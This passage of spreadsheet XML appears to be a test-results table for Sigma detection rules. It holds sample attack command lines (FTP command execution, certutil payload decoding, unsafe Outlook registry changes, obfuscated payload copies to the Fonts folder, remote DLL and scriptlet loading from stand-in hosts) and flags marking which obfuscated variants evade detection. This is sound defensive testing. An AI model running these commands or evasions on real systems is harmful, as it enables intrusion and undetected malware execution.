      <c r="H3176" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3176" s="43" t="inlineStr">
        <is>
          <t>Suspicious Encoded PowerShell Command Line (ca2092a1-c273-4878-9b4b-0d60115bf5ea); Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J3176" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3176" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3177" ht="15.75" customHeight="1" s="42">
      <c r="A3177" s="43" t="inlineStr">
        <is>
          <t>t1202</t>
        </is>
      </c>
      <c r="B3177" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmdl32_arbitrary_file_download</t>
        </is>
      </c>
      <c r="C3177" s="44" t="inlineStr">
        <is>
          <t>Potential Arbitrary File Download Via Cmdl32.EXE</t>
        </is>
      </c>
      <c r="D3177" s="44" t="inlineStr">
        <is>
          <t>f37aba28-a9e6-4045-882c-d5004043b337</t>
        </is>
      </c>
      <c r="E3177" s="44" t="inlineStr">
        <is>
          <t>cmdl32.exe -vpn -lan C:\path\to\config.txt</t>
        </is>
      </c>
      <c r="F3177" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3177" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3177" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3177" s="43" t="n"/>
      <c r="J3177" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K3177" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3178" ht="15.75" customHeight="1" s="42">
      <c r="A3178" s="43" t="n"/>
      <c r="B3178" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_ftp_arbitrary_command_execution</t>
        </is>
      </c>
      <c r="C3178" s="44" t="inlineStr">
        <is>
          <t>Potential Arbitrary Command Execution Via FTP.EXE</t>
        </is>
      </c>
      <c r="D3178" s="44" t="inlineStr">
        <is>
          <t>06b401f4-107c-4ff9-947f-9ec1e7649f1e</t>
        </is>
      </c>
      <c r="E3178" s="44" t="inlineStr">
        <is>
          <t>echo !calc.exe &gt; script.txt &amp;&amp; ftp -A &lt; script.txt</t>
        </is>
      </c>
      <c r="F3178" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3178" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3178" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3178" s="43" t="inlineStr">
        <is>
          <t>Read Contents From Stdin Via Cmd.EXE (241e802a-b65e-484f-88cd-c2dc10f9206d); Potential Arbitrary Command Execution Via FTP.EXE (06b401f4-107c-4ff9-947f-9ec1e7649f1e)</t>
        </is>
      </c>
      <c r="J3178" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3178" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3179" ht="15.75" customHeight="1" s="42">
      <c r="A3179" s="43" t="n"/>
      <c r="B3179" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_ftp_arbitrary_command_execution</t>
        </is>
      </c>
      <c r="C3179" s="44" t="inlineStr">
        <is>
          <t>Potential Arbitrary Command Execution Via FTP.EXE</t>
        </is>
      </c>
      <c r="D3179" s="44" t="inlineStr">
        <is>
          <t>06b401f4-107c-4ff9-947f-9ec1e7649f1e</t>
        </is>
      </c>
      <c r="E3179" s="44" t="inlineStr">
        <is>
          <t>echo !calc.exe &gt; script.txt &amp;&amp; ftp -a &lt; script.txt</t>
        </is>
      </c>
      <c r="F3179" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3179" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3179" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3179" s="43" t="inlineStr">
        <is>
          <t>Read Contents From Stdin Via Cmd.EXE (241e802a-b65e-484f-88cd-c2dc10f9206d); Potential Arbitrary Command Execution Via FTP.EXE (06b401f4-107c-4ff9-947f-9ec1e7649f1e)</t>
        </is>
      </c>
      <c r="J3179" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3179" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3180" ht="15.75" customHeight="1" s="42">
      <c r="A3180" s="43" t="n"/>
      <c r="B3180" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_ftp_arbitrary_command_execution</t>
        </is>
      </c>
      <c r="C3180" s="44" t="inlineStr">
        <is>
          <t>Potential Arbitrary Command Execution Via FTP.EXE</t>
        </is>
      </c>
      <c r="D3180" s="44" t="inlineStr">
        <is>
          <t>06b401f4-107c-4ff9-947f-9ec1e7649f1e</t>
        </is>
      </c>
      <c r="E3180" s="44" t="inlineStr">
        <is>
          <t>echo !calc.exe &gt; script.txt &amp;&amp; ftp -"A" &lt; script.txt</t>
        </is>
      </c>
      <c r="F3180" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3180" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3180" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3180" s="43" t="inlineStr">
        <is>
          <t>Read Contents From Stdin Via Cmd.EXE (241e802a-b65e-484f-88cd-c2dc10f9206d)</t>
        </is>
      </c>
      <c r="J3180" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3180" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3181" ht="15.75" customHeight="1" s="42">
      <c r="A3181" s="43" t="n"/>
      <c r="B3181" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_ftp_arbitrary_command_execution</t>
        </is>
      </c>
      <c r="C3181" s="44" t="inlineStr">
        <is>
          <t>Potential Arbitrary Command Execution Via FTP.EXE</t>
        </is>
      </c>
      <c r="D3181" s="44" t="inlineStr">
        <is>
          <t>06b401f4-107c-4ff9-947f-9ec1e7649f1e</t>
        </is>
      </c>
      <c r="E3181" s="44" t="inlineStr">
        <is>
          <t>echo !calc.exe &gt; script.txt &amp;&amp; ftp /"A" &lt; script.txt</t>
        </is>
      </c>
      <c r="F3181" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3181" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3181" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3181" s="43" t="inlineStr">
        <is>
          <t>Read Contents From Stdin Via Cmd.EXE (241e802a-b65e-484f-88cd-c2dc10f9206d)</t>
        </is>
      </c>
      <c r="J3181" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3181" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3182" ht="15.75" customHeight="1" s="42">
      <c r="A3182" s="43" t="n"/>
      <c r="B3182" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_zipexec</t>
        </is>
      </c>
      <c r="C3182" s="44" t="inlineStr">
        <is>
          <t>Suspicious ZipExec Execution</t>
        </is>
      </c>
      <c r="D3182" s="44" t="inlineStr">
        <is>
          <t>90dcf730-1b71-4ae7-9ffc-6fcf62bd0132</t>
        </is>
      </c>
      <c r="E3182" s="44" t="inlineStr">
        <is>
          <t>copy payload.zip payload.txt &amp;&amp; certutil -decodehex payload.txt payload.exe</t>
        </is>
      </c>
      <c r="F3182" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3182" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3182" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3182" s="43" t="n"/>
      <c r="J3182" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K3182" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3183" ht="15.75" customHeight="1" s="42">
      <c r="A3183" s="43" t="n"/>
      <c r="B3183" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_runscripthelper</t>
        </is>
      </c>
      <c r="C3183" s="44" t="inlineStr">
        <is>
          <t>Suspicious Runscripthelper.exe</t>
        </is>
      </c>
      <c r="D3183" s="44" t="inlineStr">
        <is>
          <t>eca49c87-8a75-4f13-9c73-a5a29e845f03</t>
        </is>
      </c>
      <c r="E3183" s="44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F3183" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3183" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3183" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3183" s="43" t="inlineStr">
        <is>
          <t>Suspicious Program Names (efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6); Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J3183" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3183" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3184" ht="15.75" customHeight="1" s="42">
      <c r="A3184" s="43" t="n"/>
      <c r="B3184" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_runscripthelper</t>
        </is>
      </c>
      <c r="C3184" s="44" t="inlineStr">
        <is>
          <t>Suspicious Runscripthelper.exe</t>
        </is>
      </c>
      <c r="D3184" s="44" t="inlineStr">
        <is>
          <t>eca49c87-8a75-4f13-9c73-a5a29e845f03</t>
        </is>
      </c>
      <c r="E3184" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\runscripthelper.exe C:\Windows\Temp\not_suspicious.exe &amp;&amp; C:\Windows\Temp\not_suspicious.exe surfacecheck C:\path\to\script.ps1 C:\Windows\Temp</t>
        </is>
      </c>
      <c r="F3184" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3184" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3184" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3184" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J3184" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3184" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3185" ht="15.75" customHeight="1" s="42">
      <c r="A3185" s="43" t="n"/>
      <c r="B3185" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_office_outlook_enable_unsafe_client_mail_rules</t>
        </is>
      </c>
      <c r="C3185" s="44" t="inlineStr">
        <is>
          <t>Outlook EnableUnsafeClientMailRules Setting Enabled</t>
        </is>
      </c>
      <c r="D3185" s="44" t="inlineStr">
        <is>
          <t>55f0a3a1-846e-40eb-8273-677371b8d912</t>
        </is>
      </c>
      <c r="E3185" s="44" t="inlineStr">
        <is>
          <t>set "p1=EnableUnsafe" &amp;&amp; set "p2=ClientMailRules" &amp;&amp; reg add "HKCU\Software\Policies\Microsoft\Office\16.0\Outlook\Security" /v %p1%%p2% /t REG_DWORD /d 1 /f</t>
        </is>
      </c>
      <c r="F3185" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3185" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3185" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3185" s="43" t="n"/>
      <c r="J3185" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K3185" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3186" ht="15.75" customHeight="1" s="42">
      <c r="A3186" s="43" t="n"/>
      <c r="B3186" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_office_outlook_enable_unsafe_client_mail_rules</t>
        </is>
      </c>
      <c r="C3186" s="44" t="inlineStr">
        <is>
          <t>Outlook EnableUnsafeClientMailRules Setting Enabled</t>
        </is>
      </c>
      <c r="D3186" s="44" t="inlineStr">
        <is>
          <t>55f0a3a1-846e-40eb-8273-677371b8d912</t>
        </is>
      </c>
      <c r="E3186" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "New-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\16.0\Outlook\Security' -Name 'EnableUnsafeClientMailRules' -Value 1 -PropertyType DWORD"</t>
        </is>
      </c>
      <c r="F3186" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3186" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3186" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3186" s="43" t="n"/>
      <c r="J3186" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3186" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3187" ht="15.75" customHeight="1" s="42">
      <c r="A3187" s="43" t="n"/>
      <c r="B3187" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_office_outlook_enable_unsafe_client_mail_rules</t>
        </is>
      </c>
      <c r="C3187" s="44" t="inlineStr">
        <is>
          <t>Outlook EnableUnsafeClientMailRules Setting Enabled</t>
        </is>
      </c>
      <c r="D3187" s="44" t="inlineStr">
        <is>
          <t>55f0a3a1-846e-40eb-8273-677371b8d912</t>
        </is>
      </c>
      <c r="E3187" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "New-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\16.0\Outlook\Security' -Name 'EnableUnsafeClientMailRules' -Value 1 -PropertyType DWORD"</t>
        </is>
      </c>
      <c r="F3187" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3187" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3187" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3187" s="43" t="n"/>
      <c r="J3187" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3187" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3188" ht="15.75" customHeight="1" s="42">
      <c r="A3188" s="43" t="n"/>
      <c r="B3188" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_office_outlook_enable_unsafe_client_mail_rules</t>
        </is>
      </c>
      <c r="C3188" s="44" t="inlineStr">
        <is>
          <t>Outlook EnableUnsafeClientMailRules Setting Enabled</t>
        </is>
      </c>
      <c r="D3188" s="44" t="inlineStr">
        <is>
          <t>55f0a3a1-846e-40eb-8273-677371b8d912</t>
        </is>
      </c>
      <c r="E3188" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -C "New-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\16.0\Outlook\Security' -Name 'EnableUnsafeClientMailRules' -Value 1 -PropertyType DWORD"</t>
        </is>
      </c>
      <c r="F3188" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3188" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3188" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3188" s="43" t="n"/>
      <c r="J3188" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3188" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3189" ht="15.75" customHeight="1" s="42">
      <c r="A3189" s="43" t="n"/>
      <c r="B3189" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_vscode_child_processes_anomalies</t>
        </is>
      </c>
      <c r="C3189" s="44" t="inlineStr">
        <is>
          <t>Potentially Suspicious Child Process Of VsCode</t>
        </is>
      </c>
      <c r="D3189" s="44" t="inlineStr">
        <is>
          <t>5a3164f2-b373-4152-93cf-090b13c12d27</t>
        </is>
      </c>
      <c r="E3189" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c r^undll32.exe C:\ProgramData\payload.dll,DllMain</t>
        </is>
      </c>
      <c r="F3189" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3189" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3189" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3189" s="43" t="n"/>
      <c r="J3189" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K3189" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3190" ht="15.75" customHeight="1" s="42">
      <c r="A3190" s="44" t="n"/>
      <c r="B3190" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_webdav_lnk_execution</t>
        </is>
      </c>
      <c r="C3190" s="44" t="inlineStr">
        <is>
          <t>Potentially Suspicious WebDAV LNK Execution</t>
        </is>
      </c>
      <c r="D3190" s="44" t="inlineStr">
        <is>
          <t>1412aa78-a24c-4abd-83df-767dfb2c5bbe</t>
        </is>
      </c>
      <c r="E3190" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c start \\192.168.1.50@80\share\payload.lnk</t>
        </is>
      </c>
      <c r="F3190" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3190" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3190" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3190" s="43" t="n"/>
      <c r="J3190" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K3190" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3191" ht="15.75" customHeight="1" s="42">
      <c r="A3191" s="43" t="n"/>
      <c r="B3191" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_webdav_lnk_execution</t>
        </is>
      </c>
      <c r="C3191" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious WebDAV LNK Execution</t>
        </is>
      </c>
      <c r="D3191" s="43" t="inlineStr">
        <is>
          <t>1412aa78-a24c-4abd-83df-767dfb2c5bbe</t>
        </is>
      </c>
      <c r="E3191" s="43" t="inlineStr">
        <is>
          <t>rundll32.exe \\192.168.1.10@80\DavWWWRoot\payload.dll,DllMain</t>
        </is>
      </c>
      <c r="F3191" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3191" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3191" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3191" s="43" t="inlineStr">
        <is>
          <t>Rundll32 UNC Path Execution (5cdb711b-5740-4fb2-ba88-f7945027afac); Rundll32 UNC Path Execution (5cdb711b-5740-4fb2-ba88-f7945027afac)</t>
        </is>
      </c>
      <c r="J3191" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K3191" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3192" ht="15.75" customHeight="1" s="42">
      <c r="A3192" s="44" t="n"/>
      <c r="B3192" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_webdav_lnk_execution</t>
        </is>
      </c>
      <c r="C3192" s="44" t="inlineStr">
        <is>
          <t>Potentially Suspicious WebDAV LNK Execution</t>
        </is>
      </c>
      <c r="D3192" s="44" t="inlineStr">
        <is>
          <t>1412aa78-a24c-4abd-83df-767dfb2c5bbe</t>
        </is>
      </c>
      <c r="E3192" s="44" t="inlineStr">
        <is>
          <t>rundll32.exe \\192.168.1.50\DavWWWRoot\share\payload.dll,EntryPoint</t>
        </is>
      </c>
      <c r="F3192" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3192" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3192" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3192" s="43" t="inlineStr">
        <is>
          <t>Rundll32 UNC Path Execution (5cdb711b-5740-4fb2-ba88-f7945027afac); Rundll32 UNC Path Execution (5cdb711b-5740-4fb2-ba88-f7945027afac)</t>
        </is>
      </c>
      <c r="J3192" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3192" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3193" ht="15.75" customHeight="1" s="42">
      <c r="A3193" s="44" t="inlineStr">
        <is>
          <t>t1204.002</t>
        </is>
      </c>
      <c r="B3193" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_browser_launch_from_document_reader_process</t>
        </is>
      </c>
      <c r="C3193" s="44" t="inlineStr">
        <is>
          <t>Potential Suspicious Browser Launch From Document Reader Process</t>
        </is>
      </c>
      <c r="D3193" s="44" t="inlineStr">
        <is>
          <t>1193d960-2369-499f-a158-7b50a31df682</t>
        </is>
      </c>
      <c r="E3193" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c start chrome.exe http://attacker.com</t>
        </is>
      </c>
      <c r="F3193" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3193" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3193" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3193" s="44" t="n"/>
      <c r="J3193" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K3193" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3194" ht="15.75" customHeight="1" s="42">
      <c r="A3194" s="43" t="n"/>
      <c r="B3194" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C3194" s="43" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D3194" s="43" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E3194" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /"c" copy C:\Windows\System32\regsvr32.exe %TEMP%\updater.exe &amp;&amp; wmic process call create "%TEMP%\updater.exe /s /i:http://10.0.0.5/payload.sct scrobj.dll"</t>
        </is>
      </c>
      <c r="F3194" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3194" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3194" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3194" s="4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3194" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K3194" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3195" ht="15.75" customHeight="1" s="42">
      <c r="A3195" s="43" t="inlineStr">
        <is>
          <t>t1211</t>
        </is>
      </c>
      <c r="B3195" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_hiding_malware_in_fonts_folder</t>
        </is>
      </c>
      <c r="C3195" s="44" t="inlineStr">
        <is>
          <t>Writing Of Malicious Files To The Fonts Folder</t>
        </is>
      </c>
      <c r="D3195" s="44" t="inlineStr">
        <is>
          <t>ae9b0bd7-8888-4606-b444-0ed7410cb728</t>
        </is>
      </c>
      <c r="E3195" s="43" t="inlineStr">
        <is>
          <t>copy C:\temp\payload.dll %windir%\Fonts\</t>
        </is>
      </c>
      <c r="F3195" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3195" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3195" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3195" s="43" t="n"/>
      <c r="J3195" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K3195" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3196" ht="15.75" customHeight="1" s="42">
      <c r="A3196" s="43" t="inlineStr">
        <is>
          <t>t1211</t>
        </is>
      </c>
      <c r="B3196" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_hiding_malware_in_fonts_folder</t>
        </is>
      </c>
      <c r="C3196" s="44" t="inlineStr">
        <is>
          <t>Writing Of Malicious Files To The Fonts Folder</t>
        </is>
      </c>
      <c r="D3196" s="44" t="inlineStr">
        <is>
          <t>ae9b0bd7-8888-4606-b444-0ed7410cb728</t>
        </is>
      </c>
      <c r="E3196" s="43" t="inlineStr">
        <is>
          <t>move C:\temp\payload.exe C:\Windows\Fonts\</t>
        </is>
      </c>
      <c r="F3196" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3196" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3196" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3196" s="43" t="n"/>
      <c r="J3196" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K3196" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3197" ht="15.75" customHeight="1" s="42">
      <c r="A3197" s="43" t="inlineStr">
        <is>
          <t>t1211</t>
        </is>
      </c>
      <c r="B3197" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_hiding_malware_in_fonts_folder</t>
        </is>
      </c>
      <c r="C3197" s="44" t="inlineStr">
        <is>
          <t>Writing Of Malicious Files To The Fonts Folder</t>
        </is>
      </c>
      <c r="D3197" s="44" t="inlineStr">
        <is>
          <t>ae9b0bd7-8888-4606-b444-0ed7410cb728</t>
        </is>
      </c>
      <c r="E3197" s="43" t="inlineStr">
        <is>
          <t>move C:\temp\payload.exe C:\Windows\Fonts\payload.exe</t>
        </is>
      </c>
      <c r="F3197" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3197" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3197" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3197" s="43" t="n"/>
      <c r="J3197" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K3197" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3198" ht="15.75" customHeight="1" s="42">
      <c r="A3198" s="43" t="inlineStr">
        <is>
          <t>t1211</t>
        </is>
      </c>
      <c r="B3198" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_hiding_malware_in_fonts_folder</t>
        </is>
      </c>
      <c r="C3198" s="44" t="inlineStr">
        <is>
          <t>Writing Of Malicious Files To The Fonts Folder</t>
        </is>
      </c>
      <c r="D3198" s="44" t="inlineStr">
        <is>
          <t>ae9b0bd7-8888-4606-b444-0ed7410cb728</t>
        </is>
      </c>
      <c r="E3198" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /"c" c^opy C:\temp\payload.bat C:\Windows\F^onts\</t>
        </is>
      </c>
      <c r="F3198" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3198" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3198" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3198" s="43" t="inlineStr">
        <is>
          <t>Writing Of Malicious Files To The Fonts Folder (ae9b0bd7-8888-4606-b444-0ed7410cb728)</t>
        </is>
      </c>
      <c r="J3198" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K3198" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3199" ht="15.75" customHeight="1" s="42">
      <c r="A3199" s="43" t="inlineStr">
        <is>
          <t>t1211</t>
        </is>
      </c>
      <c r="B3199" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_hiding_malware_in_fonts_folder</t>
        </is>
      </c>
      <c r="C3199" s="44" t="inlineStr">
        <is>
          <t>Writing Of Malicious Files To The Fonts Folder</t>
        </is>
      </c>
      <c r="D3199" s="44" t="inlineStr">
        <is>
          <t>ae9b0bd7-8888-4606-b444-0ed7410cb728</t>
        </is>
      </c>
      <c r="E3199" s="43" t="inlineStr">
        <is>
          <t>cmd.exe -"c" c^opy C:\temp\payload.bat C:\Windows\F^onts\</t>
        </is>
      </c>
      <c r="F3199" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3199" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3199" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3199" s="43" t="inlineStr">
        <is>
          <t>Writing Of Malicious Files To The Fonts Folder (ae9b0bd7-8888-4606-b444-0ed7410cb728)</t>
        </is>
      </c>
      <c r="J3199" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K3199" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3200" ht="15.75" customHeight="1" s="42">
      <c r="A3200" s="43" t="inlineStr">
        <is>
          <t>t1211</t>
        </is>
      </c>
      <c r="B3200" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_hiding_malware_in_fonts_folder</t>
        </is>
      </c>
      <c r="C3200" s="44" t="inlineStr">
        <is>
          <t>Writing Of Malicious Files To The Fonts Folder</t>
        </is>
      </c>
      <c r="D3200" s="44" t="inlineStr">
        <is>
          <t>ae9b0bd7-8888-4606-b444-0ed7410cb728</t>
        </is>
      </c>
      <c r="E3200" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /C c^opy C:\temp\payload.bat C:\Windows\F^onts\</t>
        </is>
      </c>
      <c r="F3200" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3200" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3200" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3200" s="43" t="inlineStr">
        <is>
          <t>Writing Of Malicious Files To The Fonts Folder (ae9b0bd7-8888-4606-b444-0ed7410cb728)</t>
        </is>
      </c>
      <c r="J3200" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K3200" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3201" ht="15.75" customHeight="1" s="42">
      <c r="A3201" s="43" t="inlineStr">
        <is>
          <t>t1211</t>
        </is>
      </c>
      <c r="B3201" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_hiding_malware_in_fonts_folder</t>
        </is>
      </c>
      <c r="C3201" s="44" t="inlineStr">
        <is>
          <t>Writing Of Malicious Files To The Fonts Folder</t>
        </is>
      </c>
      <c r="D3201" s="44" t="inlineStr">
        <is>
          <t>ae9b0bd7-8888-4606-b444-0ed7410cb728</t>
        </is>
      </c>
      <c r="E3201" s="43" t="inlineStr">
        <is>
          <t>copy C:\temp\payload.vbs C:\Windows\System32\..\Fonts\</t>
        </is>
      </c>
      <c r="F3201" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3201" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3201" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3201" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J3201" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K3201" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3202" ht="15.75" customHeight="1" s="42">
      <c r="A3202" s="43" t="inlineStr">
        <is>
          <t>t1211</t>
        </is>
      </c>
      <c r="B3202" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_hiding_malware_in_fonts_folder</t>
        </is>
      </c>
      <c r="C3202" s="44" t="inlineStr">
        <is>
          <t>Writing Of Malicious Files To The Fonts Folder</t>
        </is>
      </c>
      <c r="D3202" s="44" t="inlineStr">
        <is>
          <t>ae9b0bd7-8888-4606-b444-0ed7410cb728</t>
        </is>
